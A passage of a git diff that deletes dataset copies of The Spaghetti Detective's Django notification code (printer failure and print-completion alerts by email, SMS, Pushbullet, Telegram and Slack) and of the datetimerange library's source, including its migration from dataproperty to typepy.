LOGGER.info(f'Printer {printer.user.id} {"smells fishy" if is_warning else "is probably failing"}. Sending Alerts') - if not printer.current_print: - LOGGER.warn(f'Trying to alert on printer without current print. printer_id: {printer.id}') - return - - (_, rotated_jpg_url) = save_print_snapshot( - printer.current_print, - last_pic_of_print(printer.current_print, 'tagged'), - unrotated_jpg_path=None, - rotated_jpg_path=f'snapshots/{printer.id}/{printer.current_print.id}/{str(timezone.now().timestamp())}_rotated.jpg') - - # Calls wrapped in individual try/except because anyone of them could fail, and we still want the flow to continue - - try: - if printer.user.alert_by_email: - send_failure_alert_email(printer, rotated_jpg_url, is_warning, print_paused) - except: - sentryClient.captureException() - - try: - send_failure_alert_pushbullet(printer, rotated_jpg_url, is_warning, print_paused) - except: - sentryClient.captureException() - - try: - send_failure_alert_telegram(printer, rotated_jpg_url, is_warning, print_paused) - except: - sentryClient.captureException() - - try: - if printer.user.is_pro and printer.user.alert_by_sms: - send_failure_alert_sms(printer, is_warning, print_paused) - except: - sentryClient.captureException() - - try: - if printer.user.is_pro: - send_failure_alert_slack(printer, rotated_jpg_url, is_warning, print_paused) - except: - sentryClient.captureException() - - -def send_failure_alert_email(printer, rotated_jpg_url, is_warning, print_paused): - if not settings.EMAIL_HOST: - LOGGER.warn("Email settings are missing. Ignored send requests") - return - - subject = 'Your print {} on {} {}.'.format( - printer.current_print.filename or '', - printer.name, - 'smells fishy' if is_warning else 'is probably failing') - - ctx = { - 'printer': printer, - 'print_paused': print_paused, - 'is_warning': is_warning, - 'view_link': site.build_full_url('/printers/'), - 'cancel_link': site.build_full_url('/prints/{}/cancel/'.format(printer.current_print_id)), - 'resume_link': site.build_full_url('/prints/{}/resume/'.format(printer.current_print_id)), - } - - send_email( - user=printer.user, - subject=subject, - mailing_list='alert', - template_path='email/failure_alert.html', - ctx=ctx, - img_url=rotated_jpg_url, - ) - - -def send_failure_alert_sms(printer, is_warning, print_paused): - if not settings.TWILIO_ENABLED: - LOGGER.warn("Twilio settings are missing. Ignored send requests") - return - - if not printer.user.sms_eligible(): - return - - to_number = printer.user.phone_country_code + printer.user.phone_number - - pausing_msg = '' - if print_paused: - pausing_msg = 'Printer is paused. ' - elif printer.action_on_failure == Printer.PAUSE and is_warning: - pausing_msg = 'Printer is NOT paused. ' - - msg = 'The Spaghetti Detective - Your print {} on {} {}. {}Go check it at: {}'.format( - printer.current_print.filename or '', - printer.name, - 'smells fishy' if is_warning else 'is probably failing', - pausing_msg, - site.build_full_url('/')) - - send_sms(msg, to_number) - - -def send_failure_alert_pushbullet(printer, rotated_jpg_url, is_warning, print_paused): - if not printer.user.has_valid_pushbullet_token(): - return - - pausing_msg = '' - if print_paused: - pausing_msg = 'Printer is paused.' - elif printer.action_on_failure == Printer.PAUSE and is_warning: - pausing_msg = 'Printer is NOT paused because The Detective is not very sure about it.' - - pb = Pushbullet(printer.user.pushbullet_access_token) - title = 'The Spaghetti Detective - Failure alert!' - - msg = 'Your print {} on {} {}.'.format( - printer.current_print.filename or '', - printer.name, - 'smells fishy' if is_warning else 'is probably failing') - link = site.build_full_url('/') - body = '{}\n{}\nGo check it at: {}'.format(msg, pausing_msg, link) - - try: - file_url = None - try: - file_url = rotated_jpg_url - if not ipaddress.ip_address(urlparse(file_url).hostname).is_global: - pb.upload_file(requests.get(file_url).content, 'Detected Failure.jpg') - except: - pass - - if file_url: - pb.push_file(file_url=file_url, file_name="Detected Failure.jpg", file_type="image/jpeg", body=body, title=title) - else: - pb.push_link(title, link, body) - except (PushError, PushbulletError) as e: - LOGGER.error(e) - - -def send_failure_alert_telegram(printer, rotated_jpg_url, is_warning, print_paused): - if not printer.user.telegram_chat_id: - return - - try: - photo = requests.get(rotated_jpg_url).content - except: - photo = None - - action = '' - button_list = ['more_info'] - if print_paused: - action = 'The print is paused.' - button_list = ['cancel', 'resume', 'do_not_ask', 'more_info'] - elif printer.action_on_failure == Printer.PAUSE and is_warning: - action = 'Printer is NOT paused because The Detective is not very sure about it.' - button_list = ['cancel', 'more_info'] - - notification_text = f"""Hi {printer.user.first_name or ''}, - -_The Spaghetti Detective_ spotted some suspicious activity on your printer *{printer.name}*. - -{action}""" - - try: - send_telegram_notification(printer, notification_text, photo, buttons=button_list) - except requests.ConnectionError as e: - LOGGER.error(e) - - -def send_failure_alert_slack(printer, rotated_jpg_url, is_warning, print_paused): - if not printer.user.slack_access_token: - return - - req = requests.get( - url='https://slack.com/api/conversations.list', - params={ - 'token': printer.user.slack_access_token, - 'types': 'public_channel,private_channel' - }) - req.raise_for_status() - slack_channel_ids = [c['id'] for c in req.json()['channels'] if c['is_member']] - - for slack_channel_id in slack_channel_ids: - msg = { - "channel": slack_channel_id, - "blocks": [ - { - "type": "section", - "text": { - "type": "mrkdwn", - "text": f"*The Spaghetti Detective - Failure alert*\n\nYour print {printer.current_print.filename or ''} on {printer.name} {'smells fishy' if is_warning else 'is probably failing'}.\nThe printer is {'paused' if print_paused else 'NOT paused'}.\n<{site.build_full_url('/printers/')}|Check it out.>" - } - } - ] - } - try: - msg['blocks'].append( - { - "type": "image", - "image_url": rotated_jpg_url, - "alt_text": "Print snapshot" - } - ) - except: - pass - - req = requests.post( - url='https://slack.com/api/chat.postMessage', - headers={'Authorization': f'Bearer {printer.user.slack_access_token}'}, - json=msg - ) - req.raise_for_status() - - -def send_print_notification(_print, extra_ctx={}): - if _print.is_canceled(): - if not _print.printer.user.notify_on_canceled: - return - else: - if not _print.printer.user.notify_on_done: - return - - # Calls wrapped in individual try/except because anyone of them could fail, and we still want the flow to continue - - try: - if _print.printer.user.print_notification_by_email: - send_print_notification_email(_print, extra_ctx) - except: - sentryClient.captureException() - - try: - if _print.printer.user.print_notification_by_pushbullet: - send_print_notification_pushbullet(_print) - except: - sentryClient.captureException() - - try: - if _print.printer.user.print_notification_by_telegram: - send_print_notification_telegram(_print) - except: - sentryClient.captureException() - - try: - if _print.printer.user.is_pro: - send_print_notification_slack(_print) - except: - sentryClient.captureException() - - -def send_print_notification_email(_print, extra_ctx={}): - subject = f'{_print.filename} is canceled.' if _print.is_canceled() else f'🙌 {_print.filename} is ready.' - ctx = { - 'print': _print, - 'print_time': str(_print.ended_at() - _print.started_at).split('.')[0], - 'timelapse_link': site.build_full_url(f'/prints/{_print.id}/'), - } - ctx.update(extra_ctx) - send_email( - user=_print.printer.user, - subject=subject, - mailing_list='print_notification', - template_path='email/print_notification.html', - ctx=ctx, - img_url=_print.poster_url, - ) - - -def send_print_notification_telegram(_print): - if not _print.printer.user.telegram_chat_id: - return - - try: - photo = requests.get(_print.poster_url).content - except: - photo = None - - notification_text = f"""Hi {_print.printer.user.first_name or ''}, - -Your print job *{_print.filename}* {'has been canceled' if _print.is_canceled() else 'is done'} on printer {_print.printer.name}. -""" - try: - send_telegram_notification(_print.printer, notification_text, photo) - except requests.ConnectionError as e: - LOGGER.error(e) - - -def send_print_notification_pushbullet(_print): - if not _print.printer.user.has_valid_pushbullet_token(): - return - - pb = Pushbullet(_print.printer.user.pushbullet_access_token) - - title = 'The Spaghetti Detective - Print job notification' - link = site.build_full_url('/') - body = f"Your print job {_print.filename} {'has been canceled' if _print.is_canceled() else 'is done'} on printer {_print.printer.name}." - file_url = None - try: - file_url = _print.poster_url - if not ipaddress.ip_address(urlparse(file_url).hostname).is_global: - pb.upload_file(requests.get(file_url).content, 'Snapshot.jpg') - except: - pass - - try: - if file_url: - pb.push_file(file_url=file_url, file_name="Snapshot.jpg", file_type="image/jpeg", body=body, title=title) - else: - pb.push_link(title, link, body) - except (PushError, PushbulletError) as e: - LOGGER.error(e) - - -def send_print_notification_slack(_print): - if not _print.printer.user.slack_access_token: - return - - req = requests.get( - url='https://slack.com/api/conversations.list', - params={ - 'token': _print.user.slack_access_token, - 'types': 'public_channel,private_channel' - }) - req.raise_for_status() - slack_channel_ids = [c['id'] for c in req.json()['channels'] if c['is_member']] - - for slack_channel_id in slack_channel_ids: - msg = { - "channel": slack_channel_id, - "blocks": [ - { - "type": "section", - "text": { - "type": "mrkdwn", - "text": f"*The Spaghetti Detective - Print job notification*\n\n*G-Code*: {_print.filename} \n*Status*: {'Canceled' if _print.is_canceled() else 'Finished'}\n*Printer*: <{site.build_full_url('/printers/')}|{_print.printer.name}>" - } - } - ] - } - if _print.poster_url: - msg['blocks'].append( - { - "type": "image", - "image_url": _print.poster_url, - "alt_text": "Print snapshot" - } - ) - - req = requests.post( - url='https://slack.com/api/chat.postMessage', - headers={'Authorization': f'Bearer {_print.user.slack_access_token}'}, - json=msg - ) - req.raise_for_status() - - -# Helpers -@backoff.on_exception(backoff.expo, - (smtplib.SMTPServerDisconnected, - smtplib.SMTPSenderRefused, - smtplib.SMTPResponseException,), - max_tries=3) -def send_email(user, subject, mailing_list, template_path, ctx, img_url=None, verified_only=True, attachment=None): - if not settings.EMAIL_HOST: - LOGGER.warn("Email settings are missing. Ignored send requests") - return - - attachments = [] - if img_url: - # https://github.com/TheSpaghettiDetective/TheSpaghettiDetective/issues/43 - try: - if not ipaddress.ip_address(urlparse(img_url).hostname).is_global: - attachments = [('Image.jpg', requests.get(img_url).content, 'image/jpeg')] - except: - pass - - ctx['img_url'] = None if attachments else img_url - - # By default email verification should be required for notifications but - # maybe users will want to disable it on private servers - if settings.ACCOUNT_EMAIL_VERIFICATION != 'none' and verified_only: - emails = EmailAddress.objects.filter(user=user, verified=True) - else: - emails = EmailAddress.objects.filter(user=user) - - unsub_url = site.build_full_url(f'/unsubscribe_email/?unsub_token={user.unsub_token}&list={mailing_list}') - for email in emails: - ctx['unsub_url'] = unsub_url - message = get_template(template_path).render(ctx) - msg = EmailMessage( - subject, - message, - to=(email.email,), - from_email=settings.DEFAULT_FROM_EMAIL, - attachments=attachments, - headers={'List-Unsubscribe': f'<{unsub_url}>, '},) - msg.content_subtype = 'html' - if attachment: - msg.attach_file(attachment) - msg.send() - - -def send_sms(msg, to_number): - twilio_client = Client(settings.TWILIO_ACCOUNT_SID, settings.TWILIO_AUTH_TOKEN) - from_number = settings.TWILIO_FROM_NUMBER - - twilio_client.messages.create(body=msg, to=to_number, from_=from_number) diff --git a/v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.target.py b/v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.target.py deleted file mode 100644 index a7cb52d..0000000 --- a/v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.target.py +++ /dev/null @@ -1,427 +0,0 @@ -from allauth.account.admin import EmailAddress -from django.template.loader import render_to_string, get_template -from django.core.mail import EmailMessage -from datetime import datetime, timedelta -from django.utils import timezone -from twilio.rest import Client -from django.conf import settings -from pushbullet import Pushbullet, PushbulletError, PushError -import requests -import logging -from urllib.parse import urlparse -import ipaddress -from sentry_sdk import capture_exception -import smtplib -import backoff - -from lib.file_storage import save_file_obj -from lib.utils import save_print_snapshot, last_pic_of_print -from app.models import Printer, Print -from app.telegram_bot import send_notification as send_telegram_notification -from lib import site - -LOGGER = logging.getLogger(__name__) - - -def send_failure_alert(printer, is_warning=True, print_paused=False): - LOGGER.info(f'Printer {printer.user.id} {"smells fishy" if is_warning else "is probably failing"}. Sending Alerts') - if not printer.current_print: - LOGGER.warn(f'Trying to alert on printer without current print. printer_id: {printer.id}') - return - - (_, rotated_jpg_url) = save_print_snapshot( - printer.current_print, - last_pic_of_print(printer.current_print, 'tagged'), - unrotated_jpg_path=None, - rotated_jpg_path=f'snapshots/{printer.id}/{printer.current_print.id}/{str(timezone.now().timestamp())}_rotated.jpg') - - # Calls wrapped in individual try/except because anyone of them could fail, and we still want the flow to continue - - try: - if printer.user.alert_by_email: - send_failure_alert_email(printer, rotated_jpg_url, is_warning, print_paused) - except: - capture_exception() - - try: - send_failure_alert_pushbullet(printer, rotated_jpg_url, is_warning, print_paused) - except: - capture_exception() - - try: - send_failure_alert_telegram(printer, rotated_jpg_url, is_warning, print_paused) - except: - capture_exception() - - try: - if printer.user.is_pro and printer.user.alert_by_sms: - send_failure_alert_sms(printer, is_warning, print_paused) - except: - capture_exception() - - try: - if printer.user.is_pro: - send_failure_alert_slack(printer, rotated_jpg_url, is_warning, print_paused) - except: - capture_exception() - - -def send_failure_alert_email(printer, rotated_jpg_url, is_warning, print_paused): - if not settings.EMAIL_HOST: - LOGGER.warn("Email settings are missing. Ignored send requests") - return - - subject = 'Your print {} on {} {}.'.format( - printer.current_print.filename or '', - printer.name, - 'smells fishy' if is_warning else 'is probably failing') - - ctx = { - 'printer': printer, - 'print_paused': print_paused, - 'is_warning': is_warning, - 'view_link': site.build_full_url('/printers/'), - 'cancel_link': site.build_full_url('/prints/{}/cancel/'.format(printer.current_print_id)), - 'resume_link': site.build_full_url('/prints/{}/resume/'.format(printer.current_print_id)), - } - - send_email( - user=printer.user, - subject=subject, - mailing_list='alert', - template_path='email/failure_alert.html', - ctx=ctx, - img_url=rotated_jpg_url, - ) - - -def send_failure_alert_sms(printer, is_warning, print_paused): - if not settings.TWILIO_ENABLED: - LOGGER.warn("Twilio settings are missing. Ignored send requests") - return - - if not printer.user.sms_eligible(): - return - - to_number = printer.user.phone_country_code + printer.user.phone_number - - pausing_msg = '' - if print_paused: - pausing_msg = 'Printer is paused. ' - elif printer.action_on_failure == Printer.PAUSE and is_warning: - pausing_msg = 'Printer is NOT paused. ' - - msg = 'The Spaghetti Detective - Your print {} on {} {}. {}Go check it at: {}'.format( - printer.current_print.filename or '', - printer.name, - 'smells fishy' if is_warning else 'is probably failing', - pausing_msg, - site.build_full_url('/')) - - send_sms(msg, to_number) - - -def send_failure_alert_pushbullet(printer, rotated_jpg_url, is_warning, print_paused): - if not printer.user.has_valid_pushbullet_token(): - return - - pausing_msg = '' - if print_paused: - pausing_msg = 'Printer is paused.' - elif printer.action_on_failure == Printer.PAUSE and is_warning: - pausing_msg = 'Printer is NOT paused because The Detective is not very sure about it.' - - pb = Pushbullet(printer.user.pushbullet_access_token) - title = 'The Spaghetti Detective - Failure alert!' - - msg = 'Your print {} on {} {}.'.format( - printer.current_print.filename or '', - printer.name, - 'smells fishy' if is_warning else 'is probably failing') - link = site.build_full_url('/') - body = '{}\n{}\nGo check it at: {}'.format(msg, pausing_msg, link) - - try: - file_url = None - try: - file_url = rotated_jpg_url - if not ipaddress.ip_address(urlparse(file_url).hostname).is_global: - pb.upload_file(requests.get(file_url).content, 'Detected Failure.jpg') - except: - pass - - if file_url: - pb.push_file(file_url=file_url, file_name="Detected Failure.jpg", file_type="image/jpeg", body=body, title=title) - else: - pb.push_link(title, link, body) - except (PushError, PushbulletError) as e: - LOGGER.error(e) - - -def send_failure_alert_telegram(printer, rotated_jpg_url, is_warning, print_paused): - if not printer.user.telegram_chat_id: - return - - try: - photo = requests.get(rotated_jpg_url).content - except: - photo = None - - action = '' - button_list = ['more_info'] - if print_paused: - action = 'The print is paused.' - button_list = ['cancel', 'resume', 'do_not_ask', 'more_info'] - elif printer.action_on_failure == Printer.PAUSE and is_warning: - action = 'Printer is NOT paused because The Detective is not very sure about it.' - button_list = ['cancel', 'more_info'] - - notification_text = f"""Hi {printer.user.first_name or ''}, - -_The Spaghetti Detective_ spotted some suspicious activity on your printer *{printer.name}*. - -{action}""" - - try: - send_telegram_notification(printer, notification_text, photo, buttons=button_list) - except requests.ConnectionError as e: - LOGGER.error(e) - - -def send_failure_alert_slack(printer, rotated_jpg_url, is_warning, print_paused): - if not printer.user.slack_access_token: - return - - req = requests.get( - url='https://slack.com/api/conversations.list', - params={ - 'token': printer.user.slack_access_token, - 'types': 'public_channel,private_channel' - }) - req.raise_for_status() - slack_channel_ids = [c['id'] for c in req.json()['channels'] if c['is_member']] - - for slack_channel_id in slack_channel_ids: - msg = { - "channel": slack_channel_id, - "blocks": [ - { - "type": "section", - "text": { - "type": "mrkdwn", - "text": f"*The Spaghetti Detective - Failure alert*\n\nYour print {printer.current_print.filename or ''} on {printer.name} {'smells fishy' if is_warning else 'is probably failing'}.\nThe printer is {'paused' if print_paused else 'NOT paused'}.\n<{site.build_full_url('/printers/')}|Check it out.>" - } - } - ] - } - try: - msg['blocks'].append( - { - "type": "image", - "image_url": rotated_jpg_url, - "alt_text": "Print snapshot" - } - ) - except: - pass - - req = requests.post( - url='https://slack.com/api/chat.postMessage', - headers={'Authorization': f'Bearer {printer.user.slack_access_token}'}, - json=msg - ) - req.raise_for_status() - - -def send_print_notification(_print, extra_ctx={}): - if _print.is_canceled(): - if not _print.printer.user.notify_on_canceled: - return - else: - if not _print.printer.user.notify_on_done: - return - - # Calls wrapped in individual try/except because anyone of them could fail, and we still want the flow to continue - - try: - if _print.printer.user.print_notification_by_email: - send_print_notification_email(_print, extra_ctx) - except: - capture_exception() - - try: - if _print.printer.user.print_notification_by_pushbullet: - send_print_notification_pushbullet(_print) - except: - capture_exception() - - try: - if _print.printer.user.print_notification_by_telegram: - send_print_notification_telegram(_print) - except: - capture_exception() - - try: - if _print.printer.user.is_pro: - send_print_notification_slack(_print) - except: - capture_exception() - - -def send_print_notification_email(_print, extra_ctx={}): - subject = f'{_print.filename} is canceled.' if _print.is_canceled() else f'🙌 {_print.filename} is ready.' - ctx = { - 'print': _print, - 'print_time': str(_print.ended_at() - _print.started_at).split('.')[0], - 'timelapse_link': site.build_full_url(f'/prints/{_print.id}/'), - } - ctx.update(extra_ctx) - send_email( - user=_print.printer.user, - subject=subject, - mailing_list='print_notification', - template_path='email/print_notification.html', - ctx=ctx, - img_url=_print.poster_url, - ) - - -def send_print_notification_telegram(_print): - if not _print.printer.user.telegram_chat_id: - return - - try: - photo = requests.get(_print.poster_url).content - except: - photo = None - - notification_text = f"""Hi {_print.printer.user.first_name or ''}, - -Your print job *{_print.filename}* {'has been canceled' if _print.is_canceled() else 'is done'} on printer {_print.printer.name}. -""" - try: - send_telegram_notification(_print.printer, notification_text, photo) - except requests.ConnectionError as e: - LOGGER.error(e) - - -def send_print_notification_pushbullet(_print): - if not _print.printer.user.has_valid_pushbullet_token(): - return - - pb = Pushbullet(_print.printer.user.pushbullet_access_token) - - title = 'The Spaghetti Detective - Print job notification' - link = site.build_full_url('/') - body = f"Your print job {_print.filename} {'has been canceled' if _print.is_canceled() else 'is done'} on printer {_print.printer.name}." - file_url = None - try: - file_url = _print.poster_url - if not ipaddress.ip_address(urlparse(file_url).hostname).is_global: - pb.upload_file(requests.get(file_url).content, 'Snapshot.jpg') - except: - pass - - try: - if file_url: - pb.push_file(file_url=file_url, file_name="Snapshot.jpg", file_type="image/jpeg", body=body, title=title) - else: - pb.push_link(title, link, body) - except (PushError, PushbulletError) as e: - LOGGER.error(e) - - -def send_print_notification_slack(_print): - if not _print.printer.user.slack_access_token: - return - - req = requests.get( - url='https://slack.com/api/conversations.list', - params={ - 'token': _print.user.slack_access_token, - 'types': 'public_channel,private_channel' - }) - req.raise_for_status() - slack_channel_ids = [c['id'] for c in req.json()['channels'] if c['is_member']] - - for slack_channel_id in slack_channel_ids: - msg = { - "channel": slack_channel_id, - "blocks": [ - { - "type": "section", - "text": { - "type": "mrkdwn", - "text": f"*The Spaghetti Detective - Print job notification*\n\n*G-Code*: {_print.filename} \n*Status*: {'Canceled' if _print.is_canceled() else 'Finished'}\n*Printer*: <{site.build_full_url('/printers/')}|{_print.printer.name}>" - } - } - ] - } - if _print.poster_url: - msg['blocks'].append( - { - "type": "image", - "image_url": _print.poster_url, - "alt_text": "Print snapshot" - } - ) - - req = requests.post( - url='https://slack.com/api/chat.postMessage', - headers={'Authorization': f'Bearer {_print.user.slack_access_token}'}, - json=msg - ) - req.raise_for_status() - - -# Helpers -@backoff.on_exception(backoff.expo, - (smtplib.SMTPServerDisconnected, - smtplib.SMTPSenderRefused, - smtplib.SMTPResponseException,), - max_tries=3) -def send_email(user, subject, mailing_list, template_path, ctx, img_url=None, verified_only=True, attachment=None): - if not settings.EMAIL_HOST: - LOGGER.warn("Email settings are missing. Ignored send requests") - return - - attachments = [] - if img_url: - # https://github.com/TheSpaghettiDetective/TheSpaghettiDetective/issues/43 - try: - if not ipaddress.ip_address(urlparse(img_url).hostname).is_global: - attachments = [('Image.jpg', requests.get(img_url).content, 'image/jpeg')] - except: - pass - - ctx['img_url'] = None if attachments else img_url - - # By default email verification should be required for notifications but - # maybe users will want to disable it on private servers - if settings.ACCOUNT_EMAIL_VERIFICATION != 'none' and verified_only: - emails = EmailAddress.objects.filter(user=user, verified=True) - else: - emails = EmailAddress.objects.filter(user=user) - - unsub_url = site.build_full_url(f'/unsubscribe_email/?unsub_token={user.unsub_token}&list={mailing_list}') - for email in emails: - ctx['unsub_url'] = unsub_url - message = get_template(template_path).render(ctx) - msg = EmailMessage( - subject, - message, - to=(email.email,), - from_email=settings.DEFAULT_FROM_EMAIL, - attachments=attachments, - headers={'List-Unsubscribe': f'<{unsub_url}>, '},) - msg.content_subtype = 'html' - if attachment: - msg.attach_file(attachment) - msg.send() - - -def send_sms(msg, to_number): - twilio_client = Client(settings.TWILIO_ACCOUNT_SID, settings.TWILIO_AUTH_TOKEN) - from_number = settings.TWILIO_FROM_NUMBER - - twilio_client.messages.create(body=msg, to=to_number, from_=from_number) diff --git a/v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.diff b/v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.diff deleted file mode 100644 index d2e5ab1..0000000 --- a/v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.diff +++ /dev/null @@ -1,73 +0,0 @@ -diff --git a/datetimerange/__init__.py b/datetimerange/__init__.py - index 10659da2b1812cbec4d218b71582f73029c62fb7..936761f779c4f7dc8c2d4c03c47b6e7b6e978a89 100644 - --- a/datetimerange/__init__.py - +++ b/datetimerange/__init__.py -@@ -6,10 +6,12 @@ - - from __future__ import division - from __future__ import unicode_literals -+ - import datetime - --import dataproperty as dp - import dateutil.parser -+import typepy -+ - import dateutil.relativedelta as rdelta - - -@@ -437,6 +439,7 @@ class DateTimeRange(object): - Set the start time of the time range. - - :param datetime.datetime/str value: |param_start_datetime| -+ :raises ValueError: If the value is invalid as a datetime value. - - :Examples: - -@@ -454,16 +457,22 @@ class DateTimeRange(object): - 2015-03-22T10:00:00+0900 - NaT - """ - -- data_prop = dp.DataProperty( -- value, strict_type_mapping=dp.NOT_STRICT_TYPE_MAPPING) -- self.__validate_value(data_prop) -- self.__start_datetime = data_prop.data -+ if value is None: -+ self.__start_datetime = None -+ return -+ -+ try: -+ self.__start_datetime = typepy.type.DateTime( -+ value, strict_level=typepy.StrictLevel.MIN).convert() -+ except typepy.TypeConversionError as e: -+ raise ValueError(e) - - def set_end_datetime(self, value): - """ - Set the end time of the time range. - - :param datetime.datetime/str value: |param_end_datetime| -+ :raises ValueError: If the value is invalid as a datetime value. - - :Examples: - -@@ -481,10 +490,15 @@ class DateTimeRange(object): - NaT - 2015-03-22T10:10:00+0900 - """ - -- data_prop = dp.DataProperty( -- value, strict_type_mapping=dp.NOT_STRICT_TYPE_MAPPING) -- self.__validate_value(data_prop) -- self.__end_datetime = data_prop.data -+ if value is None: -+ self.__end_datetime = None -+ return -+ -+ try: -+ self.__end_datetime = typepy.type.DateTime( -+ value, strict_level=typepy.StrictLevel.MIN).convert() -+ except typepy.TypeConversionError as e: -+ raise ValueError(e) - - def set_time_range(self, start, end): - """ diff --git a/v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.source.py b/v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.source.py deleted file mode 100644 index 79133f2..0000000 --- a/v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.source.py +++ /dev/null @@ -1,737 +0,0 @@ -# encoding: utf-8 - -""" -.. codeauthor:: Tsuyoshi Hombashi -""" - -from __future__ import division -from __future__ import unicode_literals -import datetime - -import dataproperty as dp -import dateutil.parser -import dateutil.relativedelta as rdelta - - -class DateTimeRange(object): - """ - The class that represents the time range. - - :param datetime.datetime/str start: |param_start_datetime| - :param datetime.datetime/str end: |param_end_datetime| - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range - - .. parsed-literal:: - - 2015-03-22T10:00:00+0900 - 2015-03-22T10:10:00+0900 - - .. py:attribute:: start_time_format - - Conversion format string for :py:attr:`.start_datetime`. - - .. seealso:: :py:meth:`.get_start_time_str` - - .. py:attribute:: end_time_format - - Conversion format string for :py:attr:`.end_datetime`. - - .. seealso:: :py:meth:`.get_end_time_str` - """ - - NOT_A_TIME_STR = "NaT" - - def __init__( - self, start_datetime=None, end_datetime=None, - start_time_format="%Y-%m-%dT%H:%M:%S%z", - end_time_format="%Y-%m-%dT%H:%M:%S%z"): - - self.set_time_range(start_datetime, end_datetime) - - self.start_time_format = start_time_format - self.end_time_format = end_time_format - - self.is_output_elapse = False - self.separator = " - " - - def __repr__(self): - text_list = [ - self.get_start_time_str(), - self.get_end_time_str(), - ] - - if self.is_output_elapse: - suffix = " ({})".format(self.end_datetime - self.start_datetime) - else: - suffix = "" - - return self.separator.join(text_list) + suffix - - def __eq__(self, other): - return all([ - self.start_datetime == other.start_datetime, - self.end_datetime == other.end_datetime, - ]) - - def __ne__(self, other): - return any([ - self.start_datetime != other.start_datetime, - self.end_datetime != other.end_datetime, - ]) - - def __add__(self, other): - return DateTimeRange( - self.start_datetime + other, self.end_datetime + other) - - def __iadd__(self, other): - self.set_start_datetime(self.start_datetime + other) - self.set_end_datetime(self.end_datetime + other) - - return self - - def __sub__(self, other): - return DateTimeRange( - self.start_datetime - other, self.end_datetime - other) - - def __isub__(self, other): - self.set_start_datetime(self.start_datetime - other) - self.set_end_datetime(self.end_datetime - other) - - return self - - def __contains__(self, x): - """ - :param datetime.datetime/str x: - datetime or datetimerange to compare. - Parse and convert to datetime if the value type is ``str``. - :return: |True| if the ``x`` is within the time range - :rtype: bool - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print "2015-03-22T10:05:00+0900" in time_range - print "2015-03-22T10:15:00+0900" in time_range - time_range_smaller = DateTimeRange( - "2015-03-22T10:03:00+0900", "2015-03-22T10:07:00+0900") - print time_range_smaller in time_range - - .. parsed-literal:: - - True - False - - .. seealso:: - - :py:meth:`.validate_time_inversion` - """ - - self.validate_time_inversion() - - if isinstance(x, DateTimeRange): - return x.start_datetime >= self.start_datetime and x.end_datetime <= self.end_datetime - - try: - value = dateutil.parser.parse(x) - except (TypeError, AttributeError): - value = x - - return self.start_datetime <= value <= self.end_datetime - - @property - def start_datetime(self): - """ - :return: Start time of the time range. - :rtype: datetime.datetime - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range.start_datetime - - .. parsed-literal:: - - datetime.datetime(2015, 3, 22, 10, 0, tzinfo=tzoffset(None, 32400)) - """ - - return self.__start_datetime - - @property - def end_datetime(self): - """ - :return: End time of the time range. - :rtype: datetime.datetime - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range.end_datetime - - .. parsed-literal:: - - datetime.datetime(2015, 3, 22, 10, 10, tzinfo=tzoffset(None, 32400)) - """ - - return self.__end_datetime - - @property - def timedelta(self): - """ - :return: - (|attr_end_datetime| - |attr_start_datetime|) as |timedelta| - :rtype: datetime.timedelta - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range.timedelta - - .. parsed-literal:: - - datetime.timedelta(0, 600) - """ - - return self.end_datetime - self.start_datetime - - def is_set(self): - """ - :return: - |True| if both |attr_start_datetime| and - |attr_end_datetime| were not |None|. - :rtype: bool - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange() - print time_range.is_set() - time_range.set_time_range( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print time_range.is_set() - - .. parsed-literal:: - - False - True - """ - - return all([ - self.start_datetime is not None, - self.end_datetime is not None, - ]) - - def validate_time_inversion(self): - """ - Check time inversion of the time range. - - :raises ValueError: - If |attr_start_datetime| is - bigger than |attr_end_datetime|. - :raises TypeError: - Any one of |attr_start_datetime| and |attr_end_datetime|, - or both is inappropriate datetime value. - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:10:00+0900", "2015-03-22T10:00:00+0900") - try: - time_range.validate_time_inversion() - except ValueError: - print "time inversion" - - .. parsed-literal:: - - time inversion - """ - - if not self.is_set(): - # for python2/3 compatibility - raise TypeError - - if self.start_datetime > self.end_datetime: - message = "time inversion found: {:s} > {:s}".format( - str(self.start_datetime), str(self.end_datetime)) - raise ValueError(message) - - def is_valid_timerange(self): - """ - :return: - |True| if the time range is - not null and not time inversion. - :rtype: bool - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange() - print time_range.is_valid_timerange() - time_range.set_time_range( - "2015-03-22T10:20:00+0900", "2015-03-22T10:10:00+0900") - print time_range.is_valid_timerange() - time_range.set_time_range( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print time_range.is_valid_timerange() - - .. parsed-literal:: - - False - False - True - - .. seealso:: - - :py:meth:`.is_set` - :py:meth:`.validate_time_inversion` - """ - - try: - self.validate_time_inversion() - except (TypeError, ValueError): - return False - - return self.is_set() - - def is_intersection(self, x): - """ - :param DateTimeRange x: Value to compare - :return: |True| if intersect with ``x`` - :rtype: bool - - :Examples: 